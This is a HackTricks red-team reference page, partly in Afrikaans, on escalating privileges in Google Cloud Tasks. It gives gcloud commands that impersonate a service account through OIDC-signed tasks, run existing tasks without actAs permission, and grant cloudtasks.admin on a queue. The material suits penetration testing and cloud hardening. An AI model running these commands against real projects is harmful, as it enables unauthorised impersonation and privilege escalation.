GCP - Cloud Tasks Privesc

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Cloud Tasks

cloudtasks.tasks.create, iam.serviceAccounts.actAs

An attacker met hierdie permissies kan impersonate other service accounts deur tasks te skep wat uitgevoer word met die gespesifiseerde service account se identiteit. Dit maak dit moontlik om authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions dienste te stuur.

Create Cloud Task with service account impersonation ```bash gcloud tasks create-http-task \ task-$(date '+%Y%m%d%H%M%S') \ --location us-central1 \ --queue \ --url 'https://.us-central1.run.app' \ --method POST \ --header 'X-Hello: world' \ --body-content '{"hello":"world"}' \ --oidc-service-account-email @.iam.gserviceaccount.com ```

cloudtasks.tasks.run, cloudtasks.tasks.list

’n aanvaller met hierdie toestemmings kan bestaande geskeduleerde take uitvoer sonder om toestemming op die service account wat met die taak geassosieer is te hê. Dit maak dit moontlik om take uit te voer wat voorheen geskep is met service accounts met hoër voorregte.

Voer bestaande Cloud Task uit sonder actAs toestemming ```bash gcloud tasks run projects//locations/us-central1/queues//tasks/ ```

Die principal wat hierdie opdrag uitvoer het nie die iam.serviceAccounts.actAs toestemming nodig op die taak se service account nie. Dit laat egter slegs toe om bestaande take uit te voer — dit verleen nie die vermoë om take te skep of te wysig nie.

cloudtasks.queues.setIamPolicy

’n Aanvaller met hierdie toestemming kan hulself of ander principals Cloud Tasks roles op spesifieke queues toeken, moontlik opgradeer na roles/cloudtasks.admin wat insluit die vermoë om take te skep en uit te voer.

Verleen Cloud Tasks admin role op queue ```bash gcloud tasks queues add-iam-policy-binding \ \ --location us-central1 \ --member serviceAccount:@.iam.gserviceaccount.com \ --role roles/cloudtasks.admin ```

Dit stel die aanvaller in staat om volle Cloud Tasks admin permissions op die queue toe te ken aan enige service account wat hulle beheer.

Verwysings

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks